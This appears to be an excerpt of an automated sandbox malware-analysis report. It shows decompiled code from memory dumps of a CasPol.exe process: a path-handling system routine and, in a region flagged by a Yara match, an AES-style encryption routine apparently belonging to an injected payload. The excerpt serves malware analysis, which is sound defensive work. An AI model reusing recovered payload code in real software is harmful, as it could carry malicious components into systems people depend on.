                                                                				void* _t319;
                                                                				signed short* _t321;
                                                                				void* _t322;
                                                                				void* _t323;
                                                                				unsigned int _t324;
                                                                				signed int _t325;
                                                                				void* _t326;
                                                                				signed int _t327;
                                                                				signed int _t329;
                                                                
                                                                				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                				_v8 =  *0x171d360 ^ _t329;
                                                                				_t157 = _a8;
                                                                				_t321 = _a4;
                                                                				_t315 = __edx;
                                                                				_v548 = __ecx;
                                                                				_t305 = _a20;
                                                                				_v560 = _a12;
                                                                				_t260 = _a16;
                                                                				_v564 = __edx;
                                                                				_v580 = _a8;
                                                                				_v572 = _t260;
                                                                				_v544 = _a20;
                                                                				if( *__edx <= 8) {
                                                                					L3:
                                                                					if(_t260 != 0) {
                                                                						 *_t260 = 0;
                                                                					}
                                                                					_t254 =  &_v532;
                                                                					_v588 = 0x208;
                                                                					if((_v548 & 0x00000001) != 0) {
                                                                						_v556 =  *_t315;
                                                                						_v552 = _t315[2];
                                                                						_t161 = E0165F232( &_v556);
                                                                						_t316 = _v556;
                                                                						_v540 = _t161;
                                                                						goto L17;
                                                                					} else {
                                                                						_t306 = 0x208;
                                                                						_t298 = _t315;
                                                                						_t316 = E01646E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                						if(_t316 == 0) {
                                                                							L68:
                                                                							_t322 = 0xc0000033;
                                                                							goto L39;
                                                                						} else {
                                                                							while(_v581 == 0) {
                                                                								_t233 = _v588;
                                                                								if(_t316 > _t233) {
                                                                									_t234 = _v548;
                                                                									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                										_t254 = L01644620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                										if(_t254 == 0) {
                                                                											_t169 = 0xc0000017;
                                                                										} else {
                                                                											_t298 = _v564;
                                                                											_v588 = _t316;
                                                                											_t306 = _t316;
                                                                											_t316 = E01646E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                											if(_t316 != 0) {
                                                                												continue;
                                                                											} else {
                                                                												goto L68;
                                                                											}
                                                                										}
                                                                									} else {
                                                                										goto L90;
                                                                									}
                                                                								} else {
                                                                									_v556 = _t316;
                                                                									 *((short*)(_t329 + 0x32)) = _t233;
                                                                									_v552 = _t254;
                                                                									if(_t316 < 2) {
                                                                										L11:
                                                                										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                											_t161 = 5;
                                                                										} else {
                                                                											if(_t316 < 6) {
                                                                												L87:
                                                                												_t161 = 3;
                                                                											} else {
                                                                												_t242 = _t254[2] & 0x0000ffff;
                                                                												if(_t242 != 0x5c) {
                                                                													if(_t242 == 0x2f) {
                                                                														goto L16;
                                                                													} else {
                                                                														goto L87;
                                                                													}
                                                                													goto L101;
                                                                												} else {
                                                                													L16:
                                                                													_t161 = 2;
                                                                												}
                                                                											}
                                                                										}
                                                                									} else {
                                                                										_t243 =  *_t254 & 0x0000ffff;
                                                                										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                											if(_t316 < 4) {
                                                                												L81:
                                                                												_t161 = 4;
                                                                												goto L17;
                                                                											} else {
                                                                												_t244 = _t254[1] & 0x0000ffff;
                                                                												if(_t244 != 0x5c) {
                                                                													if(_t244 == 0x2f) {
                                                                														goto L60;
                                                                													} else {
                                                                														goto L81;
                                                                													}
                                                                												} else {
                                                                													L60:
                                                                													if(_t316 < 6) {
                                                                														L83:
                                                                														_t161 = 1;
                                                                														goto L17;
                                                                													} else {
                                                                														_t245 = _t254[2] & 0x0000ffff;
                                                                														if(_t245 != 0x2e) {
                                                                															if(_t245 == 0x3f) {
                                                                																goto L62;
                                                                															} else {
                                                                																goto L83;
                                                                															}
                                                                														} else {
                                                                															L62:
                                                                															if(_t316 < 8) {
                                                                																L85:
                                                                																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                																goto L17;
                                                                															} else {
                                                                																_t250 = _t254[3] & 0x0000ffff;
                                                                																if(_t250 != 0x5c) {
                                                                																	if(_t250 == 0x2f) {
                                                                																		goto L64;
                                                                																	} else {
                                                                																		goto L85;
                                                                																	}
                                                                																} else {
                                                                																	L64:
                                                                																	_t161 = 6;
                                                                																	goto L17;
                                                                																}
                                                                															}
                                                                														}
                                                                													}
                                                                												}
                                                                											}
                                                                											goto L101;
                                                                										} else {
                                                                											goto L11;
                                                                										}
                                                                									}
                                                                									L17:
                                                                									if(_t161 != 2) {
                                                                										_t162 = _t161 - 1;
                                                                										if(_t162 > 5) {
                                                                											goto L18;
                                                                										} else {
                                                                											switch( *((intOrPtr*)(_t162 * 4 +  &M016445F8))) {
                                                                												case 0:
                                                                													_v568 = 0x1601078;
                                                                													__eax = 2;
                                                                													goto L20;
                                                                												case 1:
                                                                													goto L18;
                                                                												case 2:
                                                                													_t163 = 4;
                                                                													goto L19;
                                                                											}
                                                                										}
                                                                										goto L41;
                                                                									} else {
                                                                										L18:
                                                                										_t163 = 0;
                                                                										L19:
                                                                										_v568 = 0x16011c4;
                                                                									}
                                                                									L20:
                                                                									_v588 = _t163;
                                                                									_v564 = _t163 + _t163;
                                                                									_t306 =  *_v568 & 0x0000ffff;
                                                                									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                									_v576 = _t265;
                                                                									if(_t265 > 0xfffe) {
                                                                										L90:
                                                                										_t322 = 0xc0000106;
                                                                									} else {
                                                                										if(_t321 != 0) {
                                                                											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                												if(_v580 != 0) {
                                                                													goto L23;
                                                                												} else {
                                                                													_t322 = 0xc0000106;
                                                                													goto L39;
                                                                												}
                                                                											} else {
                                                                												_t177 = _t306;
                                                                												goto L25;
                                                                											}
                                                                											goto L101;
                                                                										} else {
                                                                											if(_v580 == _t321) {
                                                                												_t322 = 0xc000000d;
                                                                											} else {
                                                                												L23:
                                                                												_t173 = L01644620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                												_t269 = _v592;
                                                                												_t269[2] = _t173;
                                                                												if(_t173 == 0) {
                                                                													_t322 = 0xc0000017;
                                                                												} else {
                                                                													_t316 = _v556;
                                                                													 *_t269 = 0;
                                                                													_t321 = _t269;
                                                                													_t269[1] = _v576;
                                                                													_t177 =  *_v568 & 0x0000ffff;
                                                                													L25:
                                                                													_v580 = _t177;
                                                                													if(_t177 == 0) {
                                                                														L29:
                                                                														_t307 =  *_t321 & 0x0000ffff;
                                                                													} else {
                                                                														_t290 =  *_t321 & 0x0000ffff;
                                                                														_v576 = _t290;
                                                                														_t310 = _t177 & 0x0000ffff;
                                                                														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                															_t307 =  *_t321 & 0xffff;
                                                                														} else {
                                                                															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                															E0166F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                															_t329 = _t329 + 0xc;
                                                                															_t311 = _v580;
                                                                															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                															 *_t321 = _t225;
                                                                															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                															}
                                                                															goto L29;
                                                                														}
                                                                													}
                                                                													_t271 = _v556 - _v588 + _v588;
                                                                													_v580 = _t307;
                                                                													_v576 = _t271;
                                                                													if(_t271 != 0) {
                                                                														_t308 = _t271 & 0x0000ffff;
                                                                														_v588 = _t308;
                                                                														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                															E0166F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                															_t329 = _t329 + 0xc;
                                                                															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                															 *_t321 = _t213;
                                                                															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                															}
                                                                														}
                                                                													}
                                                                													_t272 = _v560;
                                                                													if(_t272 != 0) {
                                                                														 *_t272 = _t321;
                                                                													}
                                                                													_t306 = 0;
                                                                													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                													_t275 = _v572;
                                                                													if(_t275 != 0) {
                                                                														_t306 =  *_t275;
                                                                														if(_t306 != 0) {
                                                                															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                														}
                                                                													}
                                                                													_t181 = _v544;
                                                                													if(_t181 != 0) {
                                                                														 *_t181 = 0;
                                                                														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                														if(_v540 == 5) {
                                                                															_t182 = E016252A5(1);
                                                                															_v588 = _t182;
                                                                															if(_t182 == 0) {
                                                                																E0163EB70(1, 0x17179a0);
                                                                																goto L38;
                                                                															} else {
                                                                																_v560 = _t182 + 0xc;
                                                                																_t185 = E0163AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                																if(_t185 == 0) {
                                                                																	_t324 = _v588;
                                                                																	goto L97;
                                                                																} else {
                                                                																	_t306 = _v544;
                                                                																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                																	 *(_t306 + 4) = _t282;
                                                                																	_v576 = _t282;
                                                                																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                																	 *_t306 = _t325;
                                                                																	if( *_t282 == 0x5c) {
                                                                																		_t149 = _t325 - 2; // -2
                                                                																		_t283 = _t149;
                                                                																		 *_t306 = _t283;
                                                                																		 *(_t306 + 4) = _v576 + 2;
                                                                																		_t185 = _t283 & 0x0000ffff;
                                                                																	}
                                                                																	_t324 = _v588;
                                                                																	 *(_t306 + 2) = _t185;
                                                                																	if((_v548 & 0x00000002) == 0) {
                                                                																		L97:
                                                                																		asm("lock xadd [esi], eax");
                                                                																		if((_t185 | 0xffffffff) == 0) {
                                                                																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                																			E016695D0();
                                                                																			L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                																		}
                                                                																	} else {
                                                                																		 *(_t306 + 0xc) = _t324;
                                                                																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                																	}
                                                                																	goto L38;
                                                                																}
                                                                															}
                                                                															goto L41;
                                                                														}
                                                                													}
                                                                													L38:
                                                                													_t322 = 0;
                                                                												}
                                                                											}
                                                                										}
                                                                									}
                                                                									L39:
                                                                									if(_t254 !=  &_v532) {
                                                                										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                									}
                                                                									_t169 = _t322;
                                                                								}
                                                                								goto L41;
                                                                							}
                                                                							goto L68;
                                                                						}
                                                                					}
                                                                					L41:
                                                                					_pop(_t317);
                                                                					_pop(_t323);
                                                                					_pop(_t255);
                                                                					return E0166B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                				} else {
                                                                					_t299 = __edx[2];
                                                                					if( *_t299 == 0x5c) {
                                                                						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                						if(_t256 != 0x5c) {
                                                                							if(_t256 != 0x3f) {
                                                                								goto L2;
                                                                							} else {
                                                                								goto L50;
                                                                							}
                                                                						} else {
                                                                							L50:
                                                                							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                								goto L2;
                                                                							} else {
                                                                								_t251 = E01663D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                								_pop(_t319);
                                                                								_pop(_t326);
                                                                								_pop(_t257);
                                                                								return E0166B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                							}
                                                                						}
                                                                					} else {
                                                                						L2:
                                                                						_t260 = _v572;
                                                                						goto L3;
                                                                					}
                                                                				}
                                                                				L101:
                                                                			}
                                                                0x01644405
                                                                0x01644405
                                                                0x01644405
                                                                0x016442ac
                                                                0x0164428c
                                                                0x01644282
                                                                0x01644407
                                                                0x0164440d
                                                                0x0168e2af
                                                                0x0168e2af
                                                                0x01644413
                                                                0x01644413
                                                                0x00000000
                                                                0x016441d4
                                                                0x00000000
                                                                0x016441c3
                                                                0x016441bd
                                                                0x01644415
                                                                0x01644415
                                                                0x01644416
                                                                0x01644417
                                                                0x01644429
                                                                0x0164416e
                                                                0x0164416e
                                                                0x01644175
                                                                0x01644498
                                                                0x0164449f
                                                                0x0168e12d
                                                                0x00000000
                                                                0x0168e133
                                                                0x00000000
                                                                0x0168e133
                                                                0x016444a5
                                                                0x016444a5
                                                                0x016444aa
                                                                0x00000000
                                                                0x016444bb
                                                                0x016444ca
                                                                0x016444d6
                                                                0x016444d7
                                                                0x016444d8
                                                                0x016444e3
                                                                0x016444e3
                                                                0x016444aa
                                                                0x0164417b
                                                                0x0164417b
                                                                0x0164417b
                                                                0x00000000
                                                                0x0164417b
                                                                0x01644175
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dd1195d881ceccfe6c2515aa8f17b3b759581917388a3b8a44e62192f9eec64b
                                                                • Instruction ID: 5f90dc378780ce26ca876332af912a2b20dc6ba2bb9cde9b5169c1eb9d742bfa
                                                                • Opcode Fuzzy Hash: dd1195d881ceccfe6c2515aa8f17b3b759581917388a3b8a44e62192f9eec64b
                                                                • Instruction Fuzzy Hash: F6F17C706082118BD724DF19C891B7AB7E1FF99714F04892EF986CB750EB35D881CB52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 25%
                                                                			E004057D3(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				void* _t273;
                                                                				signed int _t274;
                                                                				signed int _t283;
                                                                				signed int* _t359;
                                                                				signed int _t385;
                                                                				signed int* _t411;
                                                                				signed int _t431;
                                                                				signed int _t460;
                                                                				signed int _t480;
                                                                				signed int _t562;
                                                                				signed int _t606;
                                                                
                                                                				_t273 = __eax;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol edx, 0x8");
                                                                				_t460 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                                                				asm("ror ebx, 0x8");
                                                                				asm("rol edx, 0x8");
                                                                				_v20 = _t460;
                                                                				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                                                				asm("ror ebx, 0x8");
                                                                				asm("rol edx, 0x8");
                                                                				_t283 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                                                				asm("ror esi, 0x8");
                                                                				asm("rol edx, 0x8");
                                                                				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                                                				asm("ror edx, 0x10");
                                                                				asm("ror esi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_v24 = _t283;
                                                                				_t431 =  *(__eax + 4 + (_t283 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                                                				asm("ror esi, 0x10");
                                                                				asm("ror ebx, 0x8");
                                                                				asm("rol ebx, 0x8");
                                                                				_t606 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t283 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                                                				asm("ror ebx, 0x8");
                                                                				asm("ror edi, 0x10");
                                                                				asm("rol edi, 0x8");
                                                                				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                                                				asm("ror edi, 0x10");
                                                                				asm("ror ebx, 0x8");
                                                                				asm("rol ebx, 0x8");
                                                                				_t411 =  &(__ecx[8]);
                                                                				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t411 - 4);
                                                                				_t480 = (_a4 >> 1) - 1;
                                                                				_a4 = _t480;
                                                                				if(_t480 != 0) {
                                                                					do {
                                                                						asm("ror edi, 0x10");
                                                                						asm("ror ebx, 0x8");
                                                                						asm("rol ebx, 0x8");
                                                                						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t606 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) ^  *_t411;
                                                                						asm("ror edi, 0x10");
                                                                						asm("ror ebx, 0x8");
                                                                						asm("rol ebx, 0x8");
                                                                						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t606 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[1];
                                                                						asm("ror ebx, 0x8");
                                                                						asm("ror edi, 0x10");
                                                                						asm("rol edi, 0x8");
                                                                						_t385 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t606 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[2];
                                                                						asm("ror edi, 0x10");
                                                                						asm("ror edx, 0x8");
                                                                						asm("rol edx, 0x8");
                                                                						_v24 = _t385;
                                                                						_t562 =  *(__eax + 4 + (_t606 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[3];
                                                                						asm("ror edx, 0x10");
                                                                						asm("ror esi, 0x8");
                                                                						asm("rol esi, 0x8");
                                                                						_t431 =  *(__eax + 4 + (_t385 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t562 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[4];
                                                                						asm("ror esi, 0x10");
                                                                						asm("ror ebx, 0x8");
                                                                						asm("rol ebx, 0x8");
                                                                						_t606 =  *(__eax + 4 + (_t562 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t385 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[5];
                                                                						_v12 = _t562;
                                                                						asm("ror edi, 0x8");
                                                                						asm("ror ebx, 0x10");
                                                                						asm("rol ebx, 0x8");
                                                                						_v16 =  *(__eax + 4 + (_t562 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[6];
                                                                						asm("ror ebx, 0x10");
                                                                						asm("ror edi, 0x8");
                                                                						asm("rol edi, 0x8");
                                                                						_t411 =  &(_t411[8]);
                                                                						_t205 =  &_a4;
                                                                						 *_t205 = _a4 - 1;
                                                                						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t411 - 4);
                                                                					} while ( *_t205 != 0);
                                                                				}
                                                                				asm("ror ebx, 0x8");
                                                                				asm("rol edi, 0x8");
                                                                				 *_a8 = (( *(_t273 + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t606 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t411) & 0xff00ff00 | (( *(_t273 + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t606 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t411) & 0x00ff00ff;
                                                                				asm("ror ebx, 0x8");
                                                                				asm("rol edi, 0x8");
                                                                				_a8[1] = (( *(_t273 + 4 + (_t606 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t431 & 0x000000ff) * 4) & 0x000000ff ^ _t411[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t606 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t431 & 0x000000ff) * 4) & 0x000000ff ^ _t411[1]) & 0x00ff00ff;
                                                                				asm("ror ebx, 0x8");
                                                                				asm("rol edi, 0x8");
                                                                				_t359 = _a8;
                                                                				_t359[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t606 & 0x000000ff) * 4) & 0x000000ff ^ _t411[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t606 & 0x000000ff) * 4) & 0x000000ff ^ _t411[2]) & 0x00ff00ff;
                                                                				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                                                				asm("ror ecx, 0x8");
                                                                				asm("rol edi, 0x8");
                                                                				_t359[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t606 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t411[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t606 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t411[3]) & 0x00ff00ff;
                                                                				asm("in eax, 0x5d");
                                                                				return _t274;
                                                                			}


                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                • Instruction ID: b48a8abfd398b33141c675c61473ff866cda4f087bcb68e308b342261f2062df
                                                                • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                • Instruction Fuzzy Hash: 13026E73E547164FE720DE4ACDC4725B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 92%
                                                                			E016520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed char _v24;
                                                                				intOrPtr _v28;
                                                                				signed int _v32;
                                                                				void* _v36;
                                                                				char _v48;
                                                                				signed int _v52;
                                                                				signed int _v56;
                                                                				unsigned int _v60;
                                                                				char _v64;
                                                                				unsigned int _v68;
                                                                				signed int _v72;
                                                                				char _v73;
                                                                				signed int _v74;
                                                                				char _v75;
                                                                				signed int _v76;
                                                                				void* _v81;
                                                                				void* _v82;
                                                                				void* _v89;
                                                                				void* _v92;
                                                                				void* _v97;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				signed char _t128;
                                                                				void* _t129;
                                                                				signed int _t130;
                                                                				void* _t132;
                                                                				signed char _t133;
                                                                				intOrPtr _t135;
                                                                				signed int _t137;
                                                                				signed int _t140;
                                                                				signed int* _t144;
                                                                				signed int* _t145;
                                                                				intOrPtr _t146;
                                                                				signed int _t147;
                                                                				signed char* _t148;
                                                                				signed int _t149;
                                                                				signed int _t153;
                                                                				signed int _t169;
                                                                				signed int _t174;
                                                                				signed int _t180;
                                                                				void* _t197;
                                                                				void* _t198;
                                                                				signed int _t201;
                                                                				intOrPtr* _t202;
                                                                				intOrPtr* _t205;
                                                                				signed int _t210;
                                                                				signed int _t215;
                                                                				signed int _t218;
                                                                				signed char _t221;
                                                                				signed int _t226;
                                                                				char _t227;
                                                                				signed int _t228;
                                                                				void* _t229;
                                                                				unsigned int _t231;
                                                                				void* _t235;
                                                                				signed int _t240;
                                                                				signed int _t241;
                                                                				void* _t242;
                                                                				signed int _t246;
                                                                				signed int _t248;
                                                                				signed int _t252;
                                                                				signed int _t253;
                                                                				void* _t254;
                                                                				intOrPtr* _t256;
                                                                				intOrPtr _t257;
                                                                				unsigned int _t262;
                                                                				signed int _t265;
                                                                				void* _t267;
                                                                				signed int _t275;
                                                                
                                                                				_t198 = __ebx;
                                                                				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                				_v68 = __ecx;
                                                                				_v73 = 0;
                                                                				_t201 = __edx & 0x00002000;
                                                                				_t128 = __edx & 0xffffdfff;
                                                                				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                				_v72 = _t128;
                                                                				if((_t128 & 0x00000008) != 0) {
                                                                					__eflags = _t128 - 8;
                                                                					if(_t128 != 8) {
                                                                						L69:
                                                                						_t129 = 0xc000000d;
                                                                						goto L23;
                                                                					} else {
                                                                						_t130 = 0;
                                                                						_v72 = 0;
                                                                						_v75 = 1;
                                                                						L2:
                                                                						_v74 = 1;
                                                                						_t226 =  *0x1718714; // 0x0
                                                                						if(_t226 != 0) {
                                                                							__eflags = _t201;
                                                                							if(_t201 != 0) {
                                                                								L62:
                                                                								_v74 = 1;
                                                                								L63:
                                                                								_t130 = _t226 & 0xffffdfff;
                                                                								_v72 = _t130;
                                                                								goto L3;
                                                                							}
                                                                							_v74 = _t201;
                                                                							__eflags = _t226 & 0x00002000;
                                                                							if((_t226 & 0x00002000) == 0) {
                                                                								goto L63;
                                                                							}
